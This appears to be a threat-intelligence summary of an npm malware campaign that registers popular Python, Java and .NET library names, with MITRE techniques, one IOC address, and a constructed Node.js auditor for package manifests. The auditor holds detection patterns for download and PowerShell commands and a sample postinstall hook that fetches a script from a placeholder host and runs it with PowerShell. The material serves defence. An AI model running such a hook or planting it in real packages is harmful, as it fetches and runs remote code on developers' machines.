Developers are increasingly falling prey to malicious npm packages that reuse the names of popular libraries from other programming ecosystems, a cross-ecosystem typosquatting tactic. The packages carry obfuscated code designed to run malicious actions, exfiltrate data, and persist on the infected system.
Affected: npm ecosystem and its developers; the mimicked library names come from Python, Java, C++, .NET and Node.js
Keypoints :
- Coordinated malware operation discovered in the NPM ecosystem.
- Malicious packages mimic popular libraries from other programming languages.
- Obfuscated code is used to evade security measures.
- Exfiltration of sensitive data and persistence on the infected system.
- Common IP address traced to a cloud provider in Beijing.
- Cross-ecosystem typosquatting is the main strategy used.
- Developers' familiarity with, and trust in, well-known package names is what is being exploited.
MITRE Techniques :
- T1071.001: Application Layer Protocol: Web Protocols - fetching the malicious payload over HTTPS.
- T1059.001: Command and Scripting Interpreter: PowerShell - executing downloaded scripts.
- T1105: Ingress Tool Transfer - pulling additional tooling from remote hosts.
- T1005: Data from Local System - collecting local data and credentials.
- T1083: File and Directory Discovery - scanning directories for sensitive files.
- T1033: System Owner/User Discovery - identifying the user and environment being targeted.
- T1070.004: Indicator Removal: File Deletion - removing traces of the attack.
- T1027: Obfuscated Files and Information - hiding malicious code from reviewers and scanners.
- T1053: Scheduled Task/Job - maintaining persistence with scheduled tasks.
- T1222: File and Directory Permissions Modification - changing file permissions to retain control.
- T1041: Exfiltration Over C2 Channel - exfiltrating data over the command-and-control channel.
- T1030: Data Transfer Size Limits - exfiltrating in small chunks to evade detection.
- T1055: Process Injection - injecting malicious code into legitimate processes.
- T1082: System Information Discovery - gathering host information.
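As an added example (not code from the Socket report or from any package it describes), the following Node.js script audits a package manifest for the two warning signs summarised in the key points and technique list above: a package name that matches, or is one typo away from, a well-known library in another ecosystem, and a lifecycle install hook that fetches code over HTTPS, invokes PowerShell, or embeds an encoded blob. The watch list of library names, the pattern set and the sample manifest are constructed for illustration; the only value taken from the report is the IOC address.

```javascript
'use strict';

// Constructed watch list (illustrative, not from the report): popular library
// names from non-npm ecosystems that an attacker might register on npm.
const CROSS_ECOSYSTEM_NAMES = {
  PyPI: ['requests', 'beautifulsoup4', 'numpy', 'pandas', 'flask'],
  Maven: ['guava', 'log4j-core', 'jackson-databind', 'commons-lang3'],
  NuGet: ['newtonsoft.json', 'entityframework', 'nlog'],
  'C/C++': ['boost', 'libcurl', 'openssl', 'zlib'],
};

// The one indicator published in the report; everything else here is constructed.
const KNOWN_IOC_ADDRESSES = ['8.152.163.60'];

// Lifecycle-script patterns matching the techniques in the summary: remote
// fetch over HTTP(S) (T1071.001 / T1105), PowerShell (T1059.001), inline or
// encoded payloads (T1027), and a direct reference to a known IOC.
const SUSPICIOUS_SCRIPT_PATTERNS = [
  { id: 'remote-fetch', re: /\b(curl|wget|Invoke-WebRequest|iwr|fetch\(|https?:\/\/)/i },
  { id: 'powershell', re: /\b(powershell|pwsh)\b/i },
  { id: 'inline-eval', re: /\b(node\s+-e|eval\(|new Function\(|child_process)/i },
  { id: 'encoded-blob', re: /[A-Za-z0-9+/]{40,}={0,2}/ },
  { id: 'known-ioc', re: new RegExp('\\b(' + KNOWN_IOC_ADDRESSES.map(a => a.replace(/\./g, '\\.')).join('|') + ')\\b') },
];

// Strip scope and punctuation so `@foo/Log4J-Core` compares as `log4jcore`.
function normalizeName(name) {
  return String(name).toLowerCase().replace(/^@[^/]+\//, '').replace(/[^a-z0-9]/g, '');
}

// Optimal string alignment distance (Levenshtein plus adjacent transposition),
// enough to catch one-character typosquats such as `reqeusts`.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => [i, ...Array(b.length).fill(0)]);
  for (let j = 1; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1);
      }
    }
  }
  return d[a.length][b.length];
}

// Every other-ecosystem library the name matches exactly (the cross-ecosystem
// case from the report) or within one edit (a classic typosquat).
function findCrossEcosystemMatches(name) {
  const n = normalizeName(name);
  const hits = [];
  for (const [ecosystem, names] of Object.entries(CROSS_ECOSYSTEM_NAMES)) {
    for (const candidate of names) {
      const dist = editDistance(n, normalizeName(candidate));
      if (dist <= 1) hits.push({ ecosystem, candidate, exact: dist === 0 });
    }
  }
  return hits;
}

// Only the hooks npm runs automatically during install are inspected; a
// suspicious `test` script never executes unless the developer asks for it.
function inspectInstallHooks(manifest) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of ['preinstall', 'install', 'postinstall', 'prepare']) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    for (const { id, re } of SUSPICIOUS_SCRIPT_PATTERNS) {
      if (re.test(cmd)) findings.push({ hook, pattern: id });
    }
  }
  return findings;
}

function auditManifest(manifest) {
  return {
    name: manifest.name,
    nameMatches: findCrossEcosystemMatches(manifest.name),
    hookFindings: inspectInstallHooks(manifest),
  };
}

// Constructed sample manifest (not a real package, TEST-NET address): a Python
// library name on npm whose postinstall pulls a script over HTTPS and hands it
// to PowerShell, the shape the summary describes.
const SAMPLE_MANIFEST = {
  name: 'requests',
  version: '2.31.0',
  scripts: {
    postinstall: 'curl -s https://203.0.113.10/s.ps1 -o s.ps1 && powershell -ExecutionPolicy Bypass -File s.ps1',
  },
};

console.log(JSON.stringify(auditManifest(SAMPLE_MANIFEST), null, 2));
```

To sweep an installed tree, feed each `node_modules/<pkg>/package.json` to `auditManifest` and review every package with a non-empty result; while triaging, install with `npm install --ignore-scripts` so that no lifecycle hook runs before it has been read.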
Indicator of Compromise :
- [IP Address] 8.152.163.60
Full Story: https://socket.dev/blog/npm-targeted-by-malware-campaign-mimicking-familiar-library-names